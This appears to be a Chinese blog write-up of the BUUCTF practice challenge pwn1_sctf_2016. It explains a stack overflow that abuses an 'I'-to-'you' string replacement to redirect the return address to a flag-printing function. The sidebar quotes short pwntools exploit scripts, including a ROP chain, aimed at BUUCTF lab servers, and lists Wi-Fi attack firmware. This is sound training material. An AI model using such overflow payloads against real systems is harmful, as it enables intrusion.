[BUUCTF]PWN------pwn1_sctf_2016

最新推荐文章于 2024-04-26 17:43:46 发布
最新推荐文章于 2024-04-26 17:43:46 发布
阅读量244 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BangSen1/article/details/112667995
版权

例行检查 ,开启了NX(堆栈不可执行)保护,即堆栈上不可写入
在这里插入图片描述
nc一下,没有什么有价值的信息
在这里插入图片描述
用32位IDA打开,shift+F12查看字符串,注意到了cat flag.txt,继续跟进。
在这里插入图片描述
函数的作用是输出flag的内容,地址flag_addr=08048F0D
在这里插入图片描述
跳转到主函数
12行是输入点,但是它只读入了32(0x20)长度的数据,小于0x3c,没有办法造成溢出
15行是把"you"写入V4
17行是把’I’写入v6
下面是将所有的’I’换成"you",这样就可以进行溢出了,之后覆盖返回地址为输出flag的函数地址即可
在这里插入图片描述
exp
在这里插入图片描述
flag
在这里插入图片描述

HAIANAWEI
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
栈溢出的基础原理,EBP/EIP/ESP详解 --- buuctf rip 1题目讲解
yajuanpi4899的博客
11-28 5666
栈帧概念:一个基本函数所需要的栈空间,当调用子函数时需要调用新的栈帧 涉及到栈有三个寄存器(32):esp,eip,ebp-->对应64位的rsp,rip,rbp esp:指向当前栈帧的顶部。 ebp:指向当前栈帧的底部。 eip:指向当前栈帧中执行的指令。 栈溢出漏洞的基本方向是:父函数(caller)在调用子函数(callee)结束时,会取子函数的return address,这个地址中保存着父函数的基地址。即:在一个函数调用完以后,就要删除此时的栈帧并将Return Address
buuctf pwn rip 1,rop解法
amber_o0k的博客
11-07 1153
from pwn import * io = remote('node4.buuoj.cn', 27175) pop_rdi_ret=0x4011fb bin_sh=0x40201b syscall=0x401040 ret=0x401016 payload=b'a'*(0xf+8)+p64(ret)+p64(pop_rdi_ret)+p64(bin_sh)+p64(syscall) io.sendline(payload) io.interactive() 这个解法有点复杂了,强行构造了一波rop。.
pwn | BUUCTF rip 1&& pwn基本思路
最新发布
Mintind的博客
04-26 1132
(写得好详细我好爱(为什么payload有两种写法于。
BUUCTF -rip
weixin_56301399的博客
07-20 386
用IDAPro64bit打开pwn1后按F5反汇编源码并查看主函数,发现gets()函数读取输入到变量s中,s的长度只有0xf,即可用栈大小只有15字节,但是gets()函数并没有限制输入,显然存在栈溢出漏洞。先file./pwn1查看文件类型再checksec--file=pwn1检查一下文件保护情况。且fun()函数的起始地址为0x401186。得到信息64位,各项保护都未开启。......
BUUCTF PWN-RIP详解
weixin_43780092的博客
09-07 4926
BUU CTF PWN 入门知识详解
buuctf rip 1,ret2text解法
amber_o0k的博客
08-06 1284
from pwn import * io = remote("node4.buuoj.cn",27708) payload = b'a'* 23 + p64(0x40118a) io.sendline(payload) io.interactive() 87和8a两个地址都能奏效,往上往下都不行。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 396
buuctf-pwn 001-016题wp
BUUCTF PWN方向 1-6题 详解wp
qq_62564422的博客
02-06 1403
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUU-rip
qq_45771413的博客
04-27 669
查看保护 IDA分析 看到gets函数,这里没有输入长度限制,输入的s为16位 接下来找有没有敏感权限: shift+f12 找到了 /bin/sh,打开发现其地址在401186 Tips:这里包含了system指令,若不包含还得找到system地址,payload(填充字符串+填充rbp地址+system地址+/bin/sh地址) 尝试写exp 运行后报错:Got EOF while reading in interactive from pwn import * p = remote('node3
BUUCTF刷题之路-pwn1_sctf_20161
qq_30528603的博客
05-27 419
从我们的运行结果看,会把用户输入的I换成you。那就是说会自动帮我们把1字节变3字节,我们可以利用填充I来让程序自动填充到返回地址前。s距离ebp是0x3c也就是60个字节,那么我们填充20个I再加4个字节填充接着拼接我们的后门地址。但是新的问题产生了,fgets函数较gets函数安全一点,他有长度限制,我们看到s离ebp的距离有0x3c那么远,但是fgets只能输入32个字节,只通过fgets溢出覆盖不到返回地址。看到有个fgets函数,并且限制长度为32。这是一个32位的程序,只开启了NX保护。
buuctf pwn入门1
weixin_63231007的博客
07-07 1070
buuctf pwn 前几道简单栈溢出&格式化字符串漏洞
【Writeup】BUUCTF_Pwn_RIP覆盖一下
BAKUMANSEC - Just Do It
08-17 3856
0x01 解题思路 查看文件信息 ​ 没什么防护措施的ELF64文件。 拖入IDA x64,F5 ​ 显然可以通过栈溢出覆盖RIP。 发现命令执行函数 地址为0x401186 利用peda计算输入点距离RIP的偏移值 得出偏移量是23。 现在就可以写出覆盖RIP执行fun函数的EXP了。 0x02 EXP from pwn import * io=0 ...
BUUCTF|rip
cm_zl
04-30 2128
from pwn import * context.log_level = 'debug' io=remote('node3.buuoj.cn', "28808") payload = "A"*(0xf + 8) + p64(0x401198)+ p64(0x401186) io.sendline(payload) io.interactive()
[buuctf]pwn1_sctf_2016
逆向萌新的博客
05-30 1456
buuctfpwnpwn1_sctf_2016(细致分析)
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值